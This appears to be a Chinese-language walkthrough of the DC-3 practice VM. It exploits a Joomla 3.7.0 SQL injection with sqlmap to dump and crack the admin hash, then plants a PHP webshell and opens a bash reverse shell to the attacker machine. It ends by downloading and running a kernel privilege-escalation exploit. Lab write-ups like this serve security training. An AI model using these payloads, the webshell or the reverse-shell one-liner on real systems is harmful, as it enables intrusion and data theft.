DC-3
信息收集
先nmap发现IP:192.168.33.138
扫一下端口:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 08:39 EDT
Nmap scan report for 192.168.33.138
Host is up (0.00100s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:4E:BC:23 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds加强扫一下:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:4E:BC:23 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.007 days (since Sun Apr 18 08:30:26 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros浏览器访问一下:
发现
Welcome to DC-3.
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge. :-)只有一个flag
dirsearch扫一下
python3 dirsearch.py -u 192.168.33.138 -x 301,403[08:45:29] Starting:
[08:45:32] 200 - 18KB - /LICENSE.txt
[08:45:32] 200 - 4KB - /README.txt
[08:45:35] 200 - 31B - /administrator/cache/
[08:45:35] 200 - 2KB - /administrator/includes/
[08:45:35] 200 - 5KB - /administrator/
[08:45:35] 200 - 5KB - /administrator/index.php
[08:45:35] 200 - 31B - /administrator/logs/
[08:45:36] 200 - 31B - /bin/
[08:45:36] 200 - 31B - /cache/
[08:45:37] 200 - 31B - /cli/
[08:45:37] 200 - 31B - /components/
[08:45:37] 200 - 0B - /configuration.php
[08:45:39] 200 - 3KB - /htaccess.txt
[08:45:39] 200 - 31B - /images/
[08:45:39] 200 - 31B - /includes/
[08:45:39] 200 - 7KB - /index.php
[08:45:40] 200 - 31B - /layouts/
[08:45:40] 200 - 31B - /libraries/
[08:45:40] 200 - 31B - /media/
[08:45:40] 200 - 31B - /modules/
[08:45:42] 200 - 31B - /plugins/
[08:45:42] 200 - 836B - /robots.txt.dist
[08:45:44] 200 - 31B - /templates/
[08:45:44] 200 - 31B - /templates/index.html
[08:45:44] 200 - 0B - /templates/protostar/
[08:45:44] 200 - 0B - /templates/system/
[08:45:44] 200 - 0B - /templates/beez3/
[08:45:44] 200 - 31B - /tmp/
[08:45:45] 200 - 2KB - /web.config.txt因为知道CMS是joomla
joomscan一波发现版本号
joomscan -u 192.168.33.138[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.33.138/administrator/components
http://192.168.33.138/administrator/modules
http://192.168.33.138/administrator/templates
http://192.168.33.138/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.33.138/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not foundsql漏洞发现admin用户密码
发现Joomla3.7.0
搜索一波漏洞
searchsploit joomla | grep "3\.7"Joomla! 3.7 - SQL Injection | php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt试了一下第一个,发现好像无法利用,打开一下第二个
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?optinotallow=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?optinotallow=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: optinotallow=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: optinotallow=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: optinotallow=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)用一下sqlmap
sqlmap -u "http://192.168.33.138/index.php?optinotallow=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]发现
[09:26:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[09:26:43] [INFO] fetching database names
[09:26:43] [INFO] retrieved: 'information_schema'
[09:26:43] [INFO] retrieved: 'joomladb'
[09:26:43] [INFO] retrieved: 'mysql'
[09:26:43] [INFO] retrieved: 'performance_schema'
[09:26:43] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
[09:26:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2671 times
[09:26:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.33.138'爆个表
sqlmap -u "http://192.168.33.138/index.php?optinotallow=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering][76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+爆一下字段
sqlmap -u "http://192.168.33.138/index.php?optinotallow=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+爆一下具体内容
sqlmap -u "http://192.168.33.138/index.php?optinotallow=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' --dump -p list[fullordering]+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+对hash密码进行解密
需要对这个hash进行解密,可以使用John工具
john dc3.txt //dc3.txt内容就是刚才的hash值得到密码snoopy,成功登录到了后台。
后台连接一句话木马
之前dirsearch扫描扫到了templates模块,并且发现后台这个地方可以修改源代码,于是想到在index.php里添加一句话木马
但是连接不上,于是在这个目录下面新建了一个test.php里面写了一句话木马,而且连接成功。
反弹bash到kali上
nc -lvp 2233 //在kali上执行
bash -c 'bash -i >& /dev/tcp/192.168.33.128【kali的ip】/2233 0>&1' //在蚁剑连接机上执行关于反弹bash的原理,参考这篇[1]
还有这篇:https://blog.csdn.net/revilwang/article/details/8374362
为啥必须要bash -c???
内核提权
接下来就是提权部分,但是查看了一下,没有可执行sudo命令的用户,没有suid权限的可执行命令或者文件,没有定时任务,没有权限滥用危险文件。万不得已只能试一下内核提权了。
查看一下内核版本
lsb_release -a:
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenialuname -a:
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux搜索一下Ubuntu16.04提权漏洞
searchsploit Ubuntu 16.04
经过一番探索,发现39772.txt可以利用,打开看一下利用方法:
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on a Ubuntu 16.04 Desktop system.
Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip先在kali攻击机上wget下来
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip然后上传到本地服务器上。
这里如果不想用80端口,也可以使用该命令:
python -m SimpleHTTPServer 9999
然后在交互shell上wget下载
wget http://192.168.33.128/dc3.zip一开始出现了这样的问题
一开始以为是服务器端的问题,后来发现是这个文件夹没有可写的权限。
找了一个有可写权限的目录就下载成功了!
解压一下,然后先后按照教程执行两个脚本就可以了。
./compile.sh
./doubleput
References
[1] 参考这篇: https://blog.csdn.net/Auuuuuuuu/article/details/89059176
